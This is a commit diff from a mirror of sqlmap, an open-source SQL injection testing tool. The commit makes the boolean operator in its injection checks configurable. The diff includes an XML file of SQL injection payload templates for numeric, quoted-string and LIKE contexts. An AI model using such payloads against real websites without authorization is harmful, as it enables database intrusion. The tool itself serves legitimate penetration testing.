mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 17:46:37 +03:00
more changes
This commit is contained in:
parent
440ff639bb
commit
18d27cabc5
|
@ -54,6 +54,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
|
|||
* Double quoted string injection
|
||||
"""
|
||||
|
||||
logic = conf.logic
|
||||
randInt = randomInt()
|
||||
randStr = randomStr()
|
||||
prefix = ""
|
||||
|
@ -73,7 +74,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
|
|||
if not prefix and not postfix and case.name == "custom":
|
||||
continue
|
||||
|
||||
infoMsg = "testing %s injection " % case.desc
|
||||
infoMsg = "testing %s (%s) injection " % (case.desc, logic)
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
|
@ -86,7 +87,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
|
|||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "%s parameter '%s' is %s injectable " % (place, parameter, case.desc)
|
||||
infoMsg = "%s parameter '%s' is %s (%s) injectable " % (place, parameter, case.desc, logic)
|
||||
infoMsg += "with %d parenthesis" % parenthesis
|
||||
logger.info(infoMsg)
|
||||
return case.name
|
||||
|
|
|
@ -143,6 +143,7 @@ class Agent:
|
|||
if conf.direct:
|
||||
return self.payloadDirect(string)
|
||||
|
||||
logic = conf.logic
|
||||
query = str()
|
||||
case = getInjectionCase(kb.injType)
|
||||
|
||||
|
@ -172,6 +173,7 @@ class Agent:
|
|||
if conf.direct:
|
||||
return self.payloadDirect(string)
|
||||
|
||||
logic = conf.logic
|
||||
case = getInjectionCase(kb.injType)
|
||||
|
||||
if case is None:
|
||||
|
|
|
@ -955,6 +955,7 @@ def __setConfAttributes():
|
|||
conf.httpHeaders = []
|
||||
conf.hostname = None
|
||||
conf.loggedToOut = None
|
||||
conf.logic = "AND"
|
||||
conf.matchRatio = None
|
||||
conf.md5hash = None
|
||||
conf.multipleTargets = False
|
||||
|
|
|
@ -42,6 +42,7 @@ def checkForParenthesis():
|
|||
logMsg = "testing for parenthesis on injectable parameter"
|
||||
logger.info(logMsg)
|
||||
|
||||
logic = conf.logic
|
||||
count = 0
|
||||
case = getInjectionCase(kb.injType)
|
||||
|
||||
|
|
|
@ -3,62 +3,62 @@
|
|||
<root>
|
||||
<case name="custom" desc="custom">
|
||||
<test>
|
||||
<positive format="%s%s%s AND %s%d=%d %s" params="value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt, postfix"/>
|
||||
<negative format="%s%s%s AND %s%d=%d %s" params="value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1, postfix"/>
|
||||
<positive format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt, postfix"/>
|
||||
<negative format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt + 1, postfix"/>
|
||||
</test>
|
||||
<usage>
|
||||
<prefix format="%s " params="')' * parenthesis"/>
|
||||
<postfix format=" AND %s" params="'(' * parenthesis"/>
|
||||
<postfix format=" %s %s" params="logic, '(' * parenthesis"/>
|
||||
</usage>
|
||||
</case>
|
||||
<case name="numeric" desc="unescaped numeric">
|
||||
<test>
|
||||
<positive format="%s%s AND %s%d=%d" params="value, ")" * parenthesis, "(" * parenthesis, randInt, randInt"/>
|
||||
<negative format="%s%s AND %s%d=%d" params="value, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1"/>
|
||||
<positive format="%s%s %s %s%d=%d" params="value, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt"/>
|
||||
<negative format="%s%s %s %s%d=%d" params="value, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt + 1"/>
|
||||
</test>
|
||||
<usage>
|
||||
<prefix format="%s " params="')' * parenthesis"/>
|
||||
<postfix format=" AND %s%d=%d" params="'(' * parenthesis, randInt, randInt"/>
|
||||
<postfix format=" %s %s%d=%d" params="logic, '(' * parenthesis, randInt, randInt"/>
|
||||
</usage>
|
||||
</case>
|
||||
<case name="stringsingle" desc="single quoted string">
|
||||
<test>
|
||||
<positive format="%s'%s AND %s'%s'='%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s'%s AND %s'%s'='%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
<positive format="%s'%s %s %s'%s'='%s" params="value, ")" * parenthesis, logic, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s'%s %s %s'%s'='%s" params="value, ")" * parenthesis, logic, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</test>
|
||||
<usage>
|
||||
<prefix format="'%s " params="')' * parenthesis"/>
|
||||
<postfix format=" AND %s'%s'='%s" params="'(' * parenthesis, randStr, randStr"/>
|
||||
<postfix format=" %s %s'%s'='%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
</usage>
|
||||
</case>
|
||||
<case name="likesingle" desc="LIKE single quoted string">
|
||||
<test>
|
||||
<positive format="%s'%s AND %s'%s' LIKE '%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s'%s AND %s'%s' LIKE '%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
<positive format="%s'%s %s %s'%s' LIKE '%s" params="value, ")" * parenthesis, logic, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s'%s %s %s'%s' LIKE '%s" params="value, ")" * parenthesis, logic, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</test>
|
||||
<usage>
|
||||
<prefix format="'%s " params="')' * parenthesis"/>
|
||||
<postfix format=" AND %s'%s' LIKE '%s" params="'(' * parenthesis, randStr, randStr"/>
|
||||
<postfix format=" %s %s'%s' LIKE '%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
</usage>
|
||||
</case>
|
||||
<case name="stringdouble" desc="double quoted string">
|
||||
<test>
|
||||
<positive format="%s\"%s AND %s\"%s\"=\"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s\"%s AND %s\"%s\"=\"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
<positive format="%s\"%s %s %s\"%s\"=\"%s" params="value, ")" * parenthesis, logic, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s\"%s %s %s\"%s\"=\"%s" params="value, ")" * parenthesis, logic, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</test>
|
||||
<usage>
|
||||
<prefix format=""%s " params="')' * parenthesis"/>
|
||||
<postfix format=" AND %s\"%s\"=\"%s" params="'(' * parenthesis, randStr, randStr"/>
|
||||
<postfix format=" %s %s\"%s\"=\"%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
</usage>
|
||||
</case>
|
||||
<case name="likedouble" desc="LIKE double quoted string">
|
||||
<test>
|
||||
<positive format="%s\"%s AND %s\"%s\" LIKE \"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s\"%s AND %s\"%s\" LIKE \"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
<positive format="%s\"%s %s %s\"%s\" LIKE \"%s" params="value, ")" * parenthesis, logic, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s\"%s %s %s\"%s\" LIKE \"%s" params="value, ")" * parenthesis, logic, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</test>
|
||||
<usage>
|
||||
<prefix format=""%s " params="')' * parenthesis"/>
|
||||
<postfix format=" AND %s\"%s\" LIKE \"%s" params="'(' * parenthesis, randStr, randStr"/>
|
||||
<postfix format=" %s %s\"%s\" LIKE \"%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||
</usage>
|
||||
</case>
|
||||
</root>
|
||||
|
|
Loading…
Reference in New Issue
Block a user